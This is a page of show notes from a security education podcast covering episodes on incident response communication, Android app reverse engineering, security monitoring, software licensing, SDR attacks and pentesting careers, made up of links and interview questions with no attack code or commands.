
BrakeSec Education Podcast
463 episodes — Page 3 of 10
S2021 Ep 11: 2021-011 - Dr. Catherine J Ullman, the art of communication in an Incident - Part 2
In this episode: knowing your audience - discussing the IR impact; how did this happen? How deep do you want to tailor your potential discussion? Every level must be asking "what, when, why, how?", not just those in the trenches. Does the level of incident mean that communication scales accordingly? And much more!
Dr. Catherine J. Ullman (@investigatorchi) - Incident Response communications
Reminders: Patreon - Jeff T. just became a $2 patron! Accepted to CircleCityCon on IR communications! Bsides Rochester: Security B-Sides Rochester. Spoke at SeaSec meetups.
Qualys Update on Accellion FTA Security Incident | Qualys Security Blog; Security Advisory | SolarWinds; Family Educational Rights and Privacy Act (FERPA)
It's important to share necessary information with senior level people and higher ups, but is there such a thing as 'oversharing'? How do you toe the line between oversharing and nothing at all? In higher Ed, are you beholden to different disclosure requirements than businesses?
What is Server Side Request Forgery (SSRF)? | Acunetix; 13 Beautiful Tools to Create Status Pages for your Business (geekflare.com)
Laying communication groundwork. Status pages (notifying users).
Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel!
Send a request to @brakesec on Twitter or email [email protected] #AmazonMusic: https://brakesec.com/amazonmusic #Spotify: https://brakesec.com/spotifyBDS #Pandora: https://brakesec.com/pandora #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: [email protected] Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec
S2021 Ep 10: 2021-010 - Dr. Catherine J Ullman, the art of communication in an Incident - Part 1
Dr. Catherine J. Ullman (@investigatorchi) - Incident Response communications
Reminders: Patreon - Jeff T. just became a $2 patron! Accepted to CircleCityCon on IR communications! Bsides Rochester: Security B-Sides Rochester. Spoke at SeaSec meetups.
Qualys Update on Accellion FTA Security Incident | Qualys Security Blog; Security Advisory | SolarWinds; Family Educational Rights and Privacy Act (FERPA)
It's important to share necessary information with senior level people and higher ups, but is there such a thing as 'oversharing'? How do you toe the line between oversharing and nothing at all? In higher Ed, are you beholden to different disclosure requirements than businesses?
What is Server Side Request Forgery (SSRF)? | Acunetix; 13 Beautiful Tools to Create Status Pages for your Business (geekflare.com)
Laying communication groundwork. Status pages (notifying users).
S2021 Ep 9: 2021-009 - Jasmine Jackson (TheFluffy007), analyzing Android apps with Frida - Part 2
@thefluffy007 - A Bay Area native (Berkeley). I always tell people my computer journey started at 14, but it really started in 5th grade (have a good story to tell about this). Was a bad student in my ninth grade year - almost kicked out of high school due to cutting. Had a 1.7 GPA. After my summer internship turned it around to a 4.0. Once I graduated from high school, I knew I wanted to continue on the path of computers. Majored in Computer Science. Graduated with Bachelors and Masters in Computer Science. Graduate Certificate in Information Security and Privacy. Minor in Math. Interested in security from a Yahoo! Group on Cryptography. Liked how you can turn text into gibberish and back again. Became interested in penetration testing after moving to Charlotte, and moonlighted as a QA while a full-stack developer. Co-workers did not want me to test their code because I would always find bugs. Moved into penetration testing space. Always had an interest in mobile, but never did mobile development and decided it wasn't for me. Became interested in bug bounties and noticed that mobile payouts were higher. At this time also completed SANS 575 - Mobile Device Security and Ethical Hacking. Realized the barrier to entry was VERY low (almost non-existent) in Android as it's open source. Started to learn/expand mobile hacking on my own time. The threat exposure is VERY high with mobile hacking, as you have a web app component, network component, and phone component. I always reference a slide from Secure Works.
Link to YouTube Channel → thefluffy007 - YouTube; thefluffy007 – A security researcher's thoughts on all things security – web, mobile, and cloud; The Mobile App Security Company | NowSecure; owasp-mstg/Crackmes at master · OWASP/owasp-mstg · GitHub; Rana Android Malware (reversinglabs.com); These 21 Android Apps Contain Malware | PCMag; Android Tamer - Android Tamer; The Diary of an (Inexperienced) Bug Hunter - Intro to Android Hacking | Bugcrowd; Android Debug Bridge (adb) | Android Developers
Goal: discussing best practices and methods to reverse engineer Android applications. Introduction to Java (w3schools.com); JavaScript Introduction (w3schools.com); Introduction to Python (w3schools.com); Frida • A world-class dynamic instrumentation framework | Inject JavaScript to explore native apps on Windows, macOS, GNU/Linux, iOS, Android, and QNX (Frida can be used with JavaScript and Python, along with other languages); GitHub - dweinstein/awesome-frida: Awesome Frida - A curated list of Frida resources http://www.frida.re/ (https://github.com/frida/frida); Android APK crackme: owasp-mstg/0x05c-Reverse-Engineering-and-Tampering.md at master · OWASP/owasp-mstg · GitHub; Reverse-Engineering - YobiWiki; Apktool - A tool for reverse engineering 3rd party, closed, binary Android apps. (ibotpeaches.github.io); GitHub - MobSF/Mobile-Security-Framework-MobSF: Mobile Security Framework (MobSF) is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing, malware analysis and security assessment framework capable of performing static and dynamic analysis; IntroAndroidSecurity download | SourceForge.net ←- link to my virtual machine and Androidx86 emulator
Background: **consider this a primer for any class you might teach, a teaser, if you will** Why do we want to be able to reverse engineer APKs and IPKs? Android APKs (Android Packages) hold the source code to the application. If you can reverse this you will essentially have the keys to the kingdom. Developers and companies (if they're proprietary) will add obfuscation - a technique to make the code unreadable to thwart reverse engineers from finding out their code.
What are some of the structures and files contained in APKs that are useful for people analyzing binaries? Android applications have to have a MainActivity (written in Java). This activity is the entry point to the application. Android applications also have an AndroidManifest.xml file which is the skeleton of the application. This describes the main activity, intents, service providers, permissions, and what Android operating system can run the application.
When testing apps for security, how easy is it to emulate security and physical controls if you're not on a handset? Pretty easy. You can use an emulator. I must forewarn though - you will need A LOT of memory for it to work effectively. Are there ever any times you HAVE to use a handset? An app that tests something like Android's SafetyNet and won't run without it? Do they ever want perf testing on their apps? Was thinking about how you check events in logs, battery drain, using apps on older Android/iOS versions? When organizations or developers ask you to test an app, is there anything in particular in scope? Out of scope? How do progressive web apps differ from a more traditional app?
Lab setup: IntroToAndroidSecurity VM, Android Emulator. Tools to use: why use them? (free, full-featured). Setup and installation. OS-specific tools? Tools used - Frida, Jadx-GUI
S2021 Ep 8: 2021-008 - Jasmine Jackson (TheFluffy007), bio and background, Android app analysis - Part 1
@thefluffy007 - A Bay Area native (Berkeley). I always tell people my computer journey started at 14, but it really started in 5th grade (have a good story to tell about this). Was a bad student in my ninth grade year - almost kicked out of high school due to cutting. Had a 1.7 GPA. After my summer internship turned it around to a 4.0. Once I graduated from high school, I knew I wanted to continue on the path of computers. Majored in Computer Science. Graduated with Bachelors and Masters in Computer Science. Graduate Certificate in Information Security and Privacy. Minor in Math. Interested in security from a Yahoo! Group on Cryptography. Liked how you can turn text into gibberish and back again. Became interested in penetration testing after moving to Charlotte, and moonlighted as a QA while a full-stack developer. Co-workers did not want me to test their code because I would always find bugs. Moved into penetration testing space. Always had an interest in mobile, but never did mobile development and decided it wasn't for me. Became interested in bug bounties and noticed that mobile payouts were higher. At this time also completed SANS 575 - Mobile Device Security and Ethical Hacking. Realized the barrier to entry was VERY low (almost non-existent) in Android as it's open source. Started to learn/expand mobile hacking on my own time. The threat exposure is VERY high with mobile hacking, as you have a web app component, network component, and phone component. I always reference a slide from Secure Works.
Link to YouTube Channel → thefluffy007 - YouTube; thefluffy007 – A security researcher's thoughts on all things security – web, mobile, and cloud; The Mobile App Security Company | NowSecure; owasp-mstg/Crackmes at master · OWASP/owasp-mstg · GitHub; Rana Android Malware (reversinglabs.com); These 21 Android Apps Contain Malware | PCMag; Android Tamer - Android Tamer; The Diary of an (Inexperienced) Bug Hunter - Intro to Android Hacking | Bugcrowd; Android Debug Bridge (adb) | Android Developers
Goal: discussing best practices and methods to reverse engineer Android applications. Introduction to Java (w3schools.com); JavaScript Introduction (w3schools.com); Introduction to Python (w3schools.com); Frida • A world-class dynamic instrumentation framework | Inject JavaScript to explore native apps on Windows, macOS, GNU/Linux, iOS, Android, and QNX (Frida can be used with JavaScript and Python, along with other languages); GitHub - dweinstein/awesome-frida: Awesome Frida - A curated list of Frida resources http://www.frida.re/ (https://github.com/frida/frida); Android APK crackme: owasp-mstg/0x05c-Reverse-Engineering-and-Tampering.md at master · OWASP/owasp-mstg · GitHub; Reverse-Engineering - YobiWiki; Apktool - A tool for reverse engineering 3rd party, closed, binary Android apps. (ibotpeaches.github.io); GitHub - MobSF/Mobile-Security-Framework-MobSF: Mobile Security Framework (MobSF) is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing, malware analysis and security assessment framework capable of performing static and dynamic analysis; IntroAndroidSecurity download | SourceForge.net ←- link to my virtual machine and Androidx86 emulator
Background: **consider this a primer for any class you might teach, a teaser, if you will** Why do we want to be able to reverse engineer APKs and IPKs? Android APKs (Android Packages) hold the source code to the application. If you can reverse this you will essentially have the keys to the kingdom. Developers and companies (if they're proprietary) will add obfuscation - a technique to make the code unreadable to thwart reverse engineers from finding out their code.
What are some of the structures and files contained in APKs that are useful for people analyzing binaries? Android applications have to have a MainActivity (written in Java). This activity is the entry point to the application. Android applications also have an AndroidManifest.xml file which is the skeleton of the application. This describes the main activity, intents, service providers, permissions, and what Android operating system can run the application.
When testing apps for security, how easy is it to emulate security and physical controls if you're not on a handset? Pretty easy. You can use an emulator. I must forewarn though - you will need A LOT of memory for it to work effectively. Are there ever any times you HAVE to use a handset? An app that tests something like Android's SafetyNet and won't run without it? Do they ever want perf testing on their apps? Was thinking about how you check events in logs, battery drain, using apps on older Android/iOS versions? When organizations or developers ask you to test an app, is there anything in particular in scope? Out of scope? How do progressive web apps differ from a more traditional app?
Lab setup: IntroToAndroidSecurity VM, Android Emulator. Tools to use: why use them? (free, full-featured). Setup and installation. OS-specific tools? Tools used - Frida, Jadx-GUI
S2021 Ep 7: 2021-007 - News: Google asking for OSS to embrace standards, insider threat at Yandex, Vectr discussion
Links to discussed items:
Yandex Employee Caught Selling Access to Users' Email Inboxes (thehackernews.com)
Supply-Chain Hack Breaches 35 Companies, Including PayPal, Microsoft, Apple | Threatpost
Google pitches security standards for 'critical' open-source projects | SC Media (scmagazine.com)
Google's approach to secure software development and supply chain risk management | Google Cloud Blog
https://vectr.io/
https://www.kitploit.com/2021/02/damn-vulnerable-graphql-application.html
https://www.blumira.com/careers/?gh_jid=4000142004 - sec evangelist @blumira
S2021 Ep 6: 2021-006 - Ronnie Watson (@secopsgeek), building a security monitoring system with ELK and Wazuh - Part 2
Ronnie Watson (@secopsgeek) - Youtube: watson infosec - YouTube; watsoninfosec (Watsoninfosec) · GitHub
Wazuh - fork of OSSEC (Migrating from OSSEC · Wazuh · The Open Source Security Platform)
GitHub - ossec/ossec-hids: OSSEC is an Open Source Host-based Intrusion Detection System that performs log analysis, file integrity checking, policy monitoring, rootkit detection, real-time alerting and active response.
Implementing a Network Security Metrics Programs (giac.org) - What to track. Some suggested metrics to start with: Number of Successful Logons – from security audits. Number of Unsuccessful Logons – from security audits. Number of Virus Infections during a given period. Number of incidents reported. Number of security policy violations during a given period. Number of policy exceptions during a given period. Percentage of expired passwords. Number of guessed passwords – use a password cracker to test passwords. Number of incidents. Cost of monitoring during a given period – use your time tracking system if you have one.
6 Essential Security Features for Network Monitoring Solutions (solutionsreview.com)
Metrics of Security (nist.gov) - Security metrics are essential to comprehensive network security and CSA management. Without good metrics, analysts cannot answer many security related questions. Some examples of such questions include "Is our network more secure today than it was before?" or "Have the changes of network configurations improved our security posture?" The ultimate aim of security metrics is to ensure business continuity (or mission success) and minimize business damage by preventing or minimizing the potential impact of cyber incidents.
DNS over HTTPS: DNS over HTTPS - Wikipedia
S2021 Ep 5: 2021-005 - Ronnie Watson (@secopsgeek), building a security monitoring system with ELK and Wazuh
Ronnie Watson (@secopsgeek) - Youtube: watson infosec - YouTube; watsoninfosec (Watsoninfosec) · GitHub
Wazuh - fork of OSSEC (Migrating from OSSEC · Wazuh · The Open Source Security Platform)
GitHub - ossec/ossec-hids: OSSEC is an Open Source Host-based Intrusion Detection System that performs log analysis, file integrity checking, policy monitoring, rootkit detection, real-time alerting and active response.
Implementing a Network Security Metrics Programs (giac.org) - What to track. Some suggested metrics to start with: Number of Successful Logons – from security audits. Number of Unsuccessful Logons – from security audits. Number of Virus Infections during a given period. Number of incidents reported. Number of security policy violations during a given period. Number of policy exceptions during a given period. Percentage of expired passwords. Number of guessed passwords – use a password cracker to test passwords. Number of incidents. Cost of monitoring during a given period – use your time tracking system if you have one.
6 Essential Security Features for Network Monitoring Solutions (solutionsreview.com)
Metrics of Security (nist.gov) - Security metrics are essential to comprehensive network security and CSA management. Without good metrics, analysts cannot answer many security related questions. Some examples of such questions include "Is our network more secure today than it was before?" or "Have the changes of network configurations improved our security posture?" The ultimate aim of security metrics is to ensure business continuity (or mission success) and minimize business damage by preventing or minimizing the potential impact of cyber incidents.
DNS over HTTPS: DNS over HTTPS - Wikipedia
S2021 Ep 4: 2021-004 - Danny Akacki talks about Mergers and Acquisitions - Part 2
Discussion on Mergers and Acquisitions processes - on being acquired, but also if you're acquiring a company.
Best Practices: Best Practices of Mergers and Acquisitions (workforce.com); Best Practices In Merger Integration - Institute for Mergers, Acquisitions and Alliances (IMAA) (imaa-institute.org); The Role of Information Security in a Merger/Acquisition (bankinfosecurity.com); Security Considerations in the Merger/Acquisition Process (sans.org); The 10 steps to successful M&A integration | Bain & Company; Savvy Hackers Use Spearphishing to steal Wall Street M&A info (knowbe4.com)
"We've been acquired by X!" First thing people think: "oh no, what's gonna happen to me."
S2021 Ep 3: 2021-003 - Danny Akacki, open communications, mergers & acquisitions
Discussion on Mergers and Acquisitions processes - on being acquired, but also if you're acquiring a company.
Best Practices: Best Practices of Mergers and Acquisitions (workforce.com); Best Practices In Merger Integration - Institute for Mergers, Acquisitions and Alliances (IMAA) (imaa-institute.org); The Role of Information Security in a Merger/Acquisition (bankinfosecurity.com); Security Considerations in the Merger/Acquisition Process (sans.org); Women Unite Over CTF 3.0 (ittakesahuman.com); The 10 steps to successful M&A integration | Bain & Company; Savvy Hackers Use Spearphishing to steal Wall Street M&A info (knowbe4.com)
"We've been acquired by X!" First thing people think: "what's gonna happen to me."
S2021 Ep 2: 2021-002 - Elasticsearch license changes, Secure RPC patching for Windows, IronKey traps man's $270 million in Bitcoin
Secure RPC issue - Netlogon Domain Controller Enforcement Mode is enabled by default beginning with the February 9, 2021 Security Update, related to CVE-2020-1472 – Microsoft Security Response Center; How to manage the changes in Netlogon secure channel connections associated with CVE-2020-1472 (microsoft.com)
Elasticsearch - https://anonymoushash.vmbrasseur.com/2021/01/14/elasticsearch-and-kibana-are-now-business-risks "There are those who will point to the FAQ for the SSPL and claim that the license isn't interpreted in that way because the FAQ says so. Unfortunately, when you agree to a license you are agreeing to the text of that license document and not to a FAQ. If the text of that license document is ambiguous, then so are your rights and responsibilities under that license. Should your compliance to that license come before a judge, it's their interpretation of those rights and responsibilities that will hold sway. This ambiguity puts your organisation at risk."
Doubling down on open, Part II | Elastic Blog - license change affecting Elasticsearch and Kibana
MongoDB did something similar in 2018: mjg59 | Initial thoughts on MongoDB's new Server Side Public License (dreamwidth.org); Hacker News Discussion: MongoDB switches up its open source license | Hacker News (ycombinator.com)
@vmbrasseur: VM (Vicky) Brasseur on Twitter: "With today's relicensing to #SSPL, Elasticsearch & Kibana are no longer #OpenSource but are instead business risks: https://t.co/XNx2EMLNfH" / Twitter
Adam Jacob on Twitter: "Yeah, come on - how can this be "doubling down on open"? Some true duplicity here. https://t.co/rlJVnLxYwP - we're taking two widely used, widely distributed, widely incorporated open source projects and making them no longer open source. But we're doubling down on open!" / Twitter
[License-review] Approval: Server Side Public License, Version 2 (SSPL v2) (opensource.org) "We continue to believe that the SSPL complies with the Open Source Definition and the four essential software freedoms. However, based on its reception by the members of this list and the greater open source community, the community consensus required to support OSI approval does not currently appear to exist regarding the copyleft provision of SSPL. Thus, in order to be respectful of the time and efforts of the OSI board and this list's members, we are hereby withdrawing the SSPL from OSI consideration." (could be 'open-source', but negative feedback on mailing lists and elsewhere made them remove it from consideration by the OSI)
Open Source license requirements: The Open Source Definition | Open Source Initiative
What does this mean? If you have products that utilize Elasticsearch/MongoDB/Kibana in some way, talk to your legal teams to find out if you need to divest your org from them. These are not 'open source' licenses… they are 'source available'. It might not affect your organization, and moving to SSPL might be feasible. If your product makes any changes internally to Elasticsearch,
Notable links: JTNYDV - specifically the CIS Docker hardening; Twitter: @jtnydv
Bug Detected in Linux Mint Virtual Keyboard by Two Kids - E Hacking News - Latest Hacker News and IT Security News
https://www.bleepingcomputer.com/news/microsoft/microsoft-sysmon-now-detects-malware-process-tampering-attempts/
https://www.coindesk.com/anchorage-becomes-first-occ-approved-national-crypto-bank
https://www.cnn.com/2021/01/15/uk/bitcoin-trash-landfill-gbr-scli-intl/index.html
https://www.techradar.com/news/man-has-two-attempts-left-to-unlock-bitcoin-wallet-worth-dollar270-million
https://www.linkedin.com/posts/amandaberlin_podcast-mentalhealth-neurodiversity-activity-6755910847148691456-Lms5
https://www.linkedin.com/posts/amandaberlin_swag-securitybreach-infosecurity-activity-6755884694501498880-yAck
S2021 Ep 1: 2021-001 - News: YouTuber 'Dream' doxxed, SolarWinds passwords brute-forced, malware attacks
Dream Doxxed: Minecraft YouTuber Dream Doxxed Following Speedrun Controversy (screenrant.com)
Def Noodles on Twitter: "STANS TAKING IT TOO FAR: Dream doxed after posting a picture of his kitchen on his 2nd Twitter account. Dream has not published statement about situation yet in his public accounts. https://t.co/QuKpIYRODQ" / Twitter
OSINT issues… found him by breadcrumbs and using Zillow internal pics of his house. Craziness.
Password Guessing Used as a Weapon by SolarWinds Hackers to Breach Targets - E Hacking News - Latest Hacker News and IT Security News
How to Use APIs (explained from scratch) (secjuice.com)
Hackers target cryptocurrency users with new ElectroRAT malware | ZDNet
Cobalt Strike and Metasploit accounted for a quarter of all malware C&C servers in 2020 | ZDNet
2020-046 - SolarWinds, FireEye breaches, GE medical device issues, and 2021 predictions
End of year podcast. Blumira sponsorship.
NEWS:
IT company SolarWinds says it may have been hit in 'highly sophisticated' hack | Reuters
FireEye hacked: US cybersecurity firm FireEye hit by 'state-sponsored' attack - BBC News
https://krypt3ia.wordpress.com/ - 16 December 2020
Microsoft flexing muscle to shut down C2: Microsoft unleashes 'Death Star' on SolarWinds hackers in extraordinary response to breach - GeekWire
Little-known SolarWinds gets scrutiny over hack, stock sales (apnews.com)
FireEye, GoDaddy, and Microsoft create kill switch for SolarWinds backdoor | Security Affairs
US Gov hacked: US government agencies hacked; Russia a possible culprit (apnews.com)
Not mentioned during the podcast: Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor | FireEye Inc
Not trying to spread FUD, but would infiltration by using FOSS tools be easier than SolarWinds?
Time to remove Nano Adblocker and Defender from your browsers (except Firefox) - gHacks Tech News
System oriented programming - Cloud-Sliver (cloud-sliver.com)
Google Cloud (over)Run: How a free trial experiment ended with a $72,000 bill overnight • The Register
G'bye Flash… Adobe releases final Flash Player update, warns of 2021 kill switch (bleepingcomputer.com)
IT workers worried about AI making them obsolete… IT Workers Fear Becoming Obsolete in Cyber Roles - Infosecurity Magazine (infosecurity-magazine.com)
Vulnerabilities Found in Multiple GE Imaging Systems - Infosecurity Magazine (infosecurity-magazine.com)
Qbot malware switched to stealthy new Windows autostart method (bleepingcomputer.com)
https://www.atlasobscura.com/places/encryption-lava-lamps - "The randomness of this wall of lava lamps helps encrypt up to 10 percent of the internet."
It's been the year of the business continuity program this year… and how agile yours is. Thoughts? Future?
Bryan: Companies that are 'all in' on remote work will backtrack.
Amanda: I think we'll see way more keep the WFH now that they realize it saves $$.
SPONSORED - Nathanael Iversen from Illumio, future of microsegmentation
BrakeSec Sponsored Interview with Nathanael Iversen
Questions, comments, and other content goes here:
Illumio - Nathanael Iversen - BDS Podcast Messaging
Topic: Overview of development and deployment of micro-segmentation
Where does segmentation fit into your security strategy?
Micro-segmentation is a preventive measure deployed to create and enforce access at the workload layer. It does not replace identity and access management (IAM), perimeter firewalls, or patching but complements such solutions. Because traditional network segmentation is done with network devices, it only works when the traffic passes through that control point. Micro-segmentation, on the other hand, shifts the enforcement point from the network onto the individual servers and hosts. This means that segmentation policy can be much more granular and can encompass all inbound and outbound traffic, not just the traffic leaving a network zone, VLAN, or environment. Micro-segmentation is a great deterrent for hackers. More organizations are implementing micro-segmentation as an essential part of a defense-in-depth strategy. According to a recent survey of over 300 IT professionals, 45% currently have a segmentation project or are planning one.
The keys to a successful micro-segmentation deployment:
As with any security control, it's important to balance the strategy of the business with the need to secure it. There are several key functions and abilities to consider to ensure your deployment goes smoothly:
Visibility with application context
Scalable architecture
Abstracted security policies
Granular controls
Consistent policy framework across your compute estate
Integration with security ecosystem
Preventative Cybersecurity
There are three broad preventive security actions:
First is controlling the ability to reach the device or target service via the network. Clearly, if you cannot even get to the sensitive data or application, then no amount of vulnerabilities will permit compromise. Often terms like firewall, access control lists (ACLs), VLANs, zones, and the like describe these capabilities. This function is generally implemented by the network team or a dedicated network security team.
The second broad action available controls the ability to access a device, data or service once you get there. This covers the entire world of credentials, user accounts, permissions, authentication, authorization, tokens, API keys, etc. If you get to the front door of my house and it is locked, you can't gain access unless you have the right key.
The third broad strategy addresses the fact that often malicious behavior exploits some bug or weakness. So, if one can remove vulnerable code, then in many cases, malicious intent can't be realized. This involves patching, replatforming applications to stronger platforms, doing code reviews, and more.
Potential questions:
What is micro-segmentation? How long has it been around?
Can micro-segmentation be used in conjunction with other cybersecurity tools? Like firewalls?
How does micro-segmentation operate in different environments? How does development and deployment differ in the cloud vs. on-prem?
What does a successful micro-segmentation deployment look like?
Tell us about the common challenges people face in their micro-segmentation projects.
What misconceptions do people have about micro-segmentation?
What is the difference between having a proactive vs. reactive security strategy?
Can you explore the 'cost' of preventative cybersecurity in 2020? I.e., how much can your organization save by preventing breaches, vs. paying off ransomware attackers? Or losing customer trust via a public breach?
What does micro-segmentation adoption look like as we head into the new year? What is the future of micro-segmentation?
Segmentation of database areas? Logs?

S2020 Ep 452020-045-Marco Salvati, supporting open source devs, incentivizing leeching companies who don't give back- part2
https://www.hak4kidz.com/activities/cdcedu.html - Online CTF training using Cisco's Workshop platform. They did something similar in Spring of 2020. There will be an online panel where kids can ask questions about information security. Occurs on December 12th. Check out the link for more info.
Robert M. for upping his Patreon to $5
Top 25 Data Security Podcasts You Must Follow in 2020 (feedspot.com)
@byt3bl33d3r (Marcello Salvati)
@porchetta_ind (Porchetta Industries)
[email protected]
Wanna sponsor CrackMapExec? Sponsor @byt3bl33d3r on GitHub Sponsors
GitHub Sponsors: GitHub Sponsors
Introducing Sponsorware: How A Small Open Source Package Increased My Salary By $11k in Two Days | Caleb Porzio
How is this different than shareware?
"As a developer of one of these tools, you obviously start questioning your life decisions after a while. Especially after putting so much time into these projects."
Adblockers installed 300,000 times are malicious and should be removed now | Ars Technica (spent years supporting the app… the vitriol from 'unpaid customers' is deafening… Should be required reading for anyone wanting to open source anything.)
[Announcement] Recent and upcoming changes to the Nano projects · Issue #362 · NanoAdblocker/NanoCore (github.com)
Business model for typical open source projects. Where's the chain broken at? Devs who expect help/support for their project?
"Many eyes make for less vulns" (LOL, sounds good, not true anymore --brbr)
What is the 'status quo' of the OSS infosec/hacking tool developer community (in your opinion)?
Pull requests, what are 'meaningful' contributions?
What is the definition of 'widely-used'? Why support widely-used OSS hacking tools?
(2) Marcello on Twitter: "Well also be encouraging community contributions to those same tools by giving out 1 @offsectraining training voucher per quarter to whoever submits the most meaningful pull request to any of the tools in the @porchetta_ind Discord server" / Twitter
And now for something completely different... (porchetta.industries)

S2020 Ep 442020-044-Marcello Salvati (@byt3bl33d3r), porchetta industries, supporting opensource tool creators, sponsorship model
S2020 Ep 432020-043-Software_Defined_Radio-Sebastien_dudek-RF-attacks- IoT and car RF attacks
Sébastien Dudek - @FlUxIuS @penthertz
Why are we here today?
Software Defined Radio (sdr-radio.com)
What kind of hardware or software do you need?
Why would a security professional want to know how to use SDR tools and attacks?
What other kinds of attacks can be launched? (I mean, other than replay type attacks)
Door systems (badge systems)
NFC? Contactless credit card attacks
Smart building/home control systems
Bluetooth attacks
Point Of Sale systems
Cellular radio 3G/4G/5G
Industrial control systems
Home appliances
Medical telemetry systems
Drones!
LoRa - Wikipedia
DASH7 - Wikipedia - custom TCP stack for LoRa
Vehicle-to-grid - Wikipedia (V2G)
Automatic Wireless Protocol Reverse Engineering | USENIX
Hunting mobile devices endpoints - the RF and the Hard way | Synacktiv - Sébastien Dudek
How Can Drones Be Hacked? The updated list of vulnerable drones & attack tools | by Sander Walters | Medium
Carrier Aggregation explained (3gpp.org)
Mobile phone jammer - Wikipedia
World's top hackers meet at the first 5G Cyber Security Hackathon - Security Boulevard
Supply chain attacks - systems tend to use wireless chipsets or protocols
LTE-torpedo-NDSS19.pdf (uiowa.edu) - privacy attacks on 4G/5G networks using side channel information
How does someone make a Faraday cage on the cheap? (mentioned in one of your class agendas)
Lots of IoT devices use your typical home wifi connection, can't you just sniff packets to get what you need?
Replay attacks on car fobs: Jam and Replay Attacks on Vehicular Keyless Entry Systems (s34s0n.github.io)
Attacks on Tesla wireless entry: Tesla's keyless entry vulnerable to spoofing attack, researchers find - The Verge
Garage door opener attacks: How to Hack a Garage Door in Under 10 Seconds and What You Can Do About It - ITS Tactical
Kid's toy opens garage doors: This Hacked Kids' Toy Opens Garage Doors in Seconds | WIRED
What are the current limitations to testing wireless and RF related systems? What about custom wireless implementations? Cellular? Zigbee?
I'm a wireless manufacturer of some kind of device. I'm freaked now by hearing you talk about how easy it is to attack wireless systems. What are some things I could do to ensure that the types of attacks we discussed here cannot affect me? Wireless defense system?
https://www.researchgate.net/publication/321491751_Security_Mechanisms_to_Defend_against_New_Attacks_on_Software-Defined_Radio
List of SDR software: The BIG List of RTL-SDR Supported Software (rtl-sdr.com)

SPONSORED Podcast: Katey Wood from Illumio on deployment and using Windows Filtering Platform
**Apologies on the Zoom issues**
This is the 2nd of 3 sponsored podcast interviews with Illumio about their zero trust product.
Katey Wood is the Director of Product Marketing at Illumio. https://www.linkedin.com/in/kateywood/
Topic: Conversation on segmentation and ransomware
Topic Background: The attack surface and vulnerabilities are on the rise, along with cyber attacks. Why?
Remote everything - cloud collaboration (including processing PII) is the new normal and that means the attack surface is heightened. This requires appropriate network, cloud, and endpoint security.
Double ransom with #data #exfiltration -- more attackers are exfiltrating customer data from businesses and (if ransom is withheld) extorting consumers directly through bitcoin - often in the headlines.
Privacy is a chief security concern now more than ever before, as remote everything continues and #cyberattacks and #ransomware attacks skyrocket. For businesses, Covid and the new WFH normal means even more vulnerabilities and greater incentive to pay an even higher ransom to avoid privacy law penalties and class-action litigation.
Enter Segmentation. Perimeter security is important, but unfortunately, we all know that alone it's not enough (i.e. breach, after breach, after high-profile breach). #ZeroTrust, the assume-breach mentality and default deny are philosophies that take security deeper to protect organizations from a threat moving laterally within their environment. This is helpful because it's often not the initial point of breach that causes so much damage; it's the breach spreading to more critical data and assets that's so destructive.
#Network #segmentation is a crucial control to secure critical data and PII, by ring-fencing applications with patient or client data. Implementing Zero Trust security policies limits access to only allowed parties with a legitimate business purpose and stops the attacker from moving freely across the network to the most valuable data.
#Illumio helps #healthcare, academic, and other critical industries keep their crown jewels safe through better, more scalable micro-segmentation that decouples Zero Trust from the constraints of the network by implementing it on the workload.
Vertical 'Brakedown' - Healthcare and Education
Businesses in the healthcare and education industries, which often have large numbers of customers and employees and handle large volumes of PII, are especially at risk. Both have already been under scrutiny for privacy concerns around PII for years, through regulations like #HIPAA in healthcare and #FERPA in education (and now #CCPA). Now that distance learning is the norm and medical records have gone largely electronic, it's even easier for attackers to move between systems if there are no network segmentation access policies in place to prevent it.
Potential Questions:
Customer data cases: 'Dead data'
With today's workforce largely remote, tell me what that means from a security standpoint. What challenges are businesses facing to protect important data/PII?
What is that data "worth" and what are the consequences of falling victim to a ransomware attack or similar event from a bad actor?
Talk to me about the "assume breach mentality." What does that mean and how can you/why should you use this philosophy in your approach to security?
How does segmentation relate to compliance? How do the two go hand in hand?
How does segmentation protect organizations against large scale breaches?
In terms of cost, is segmentation a sizable investment for SMBs? Is it a worthwhile investment, in terms of dollars saved from ransomware attacks?
#Segmentation is often thought of as a big (perhaps cumbersome) project; how do you suggest organizations make it more scalable?
How does segmentation protect end users?
S2020 Ep 422020-042-Kim Crawley and Phillip Wylie discuss "Pentester Blueprint", moving into pentesting career
Phillip Wylie @philipwylie and Kim Crawley @kim_crawley
Amazon: The Pentester BluePrint: Your Guide to Being a Pentester: 9781119684305: Computer Science Books @ AmazonSmile - November 24th for paper copy
Steven Levy: Hackers: Heroes of the Computer Revolution: Steven Levy: 9781449388393: Amazon.com: Books
Why did you write the book?
What is a pentester?
Skills needed
Education of hacker
Building a lab
Kali Linux
Pentester Framework
Docker
OWASP Juice Box
Vulnhub
Overthewire
PicoCTF
Developing a plan
Gaining experience
Gaining employment
Better hiring - Sarah on Twitter: "I want more women and enbies in pentesting/red teaming. I would really like to know how to do that. But as teams usually only hire people with experience, I'm at a bit of a loss for how to get people into the field at all. (I would like to not be an exception)" / Twitter
Hacking is not a Crime - hacktivist org? https://www.hackingisnotacrime.org/
S2020 Ep 412020-041- Conor Sherman, IR stories, cost of not prepping for an incident
"Between stimulus and response there is a space. In that space is our power to choose our response. In our response lies our growth and our freedom." --Viktor Frankl https://smile.amazon.com/Mans-Search-for-Meaning-audiobook/dp/B0006IU470
https://twitter.com/conordsherman
Conor Sherman - IR stories and more
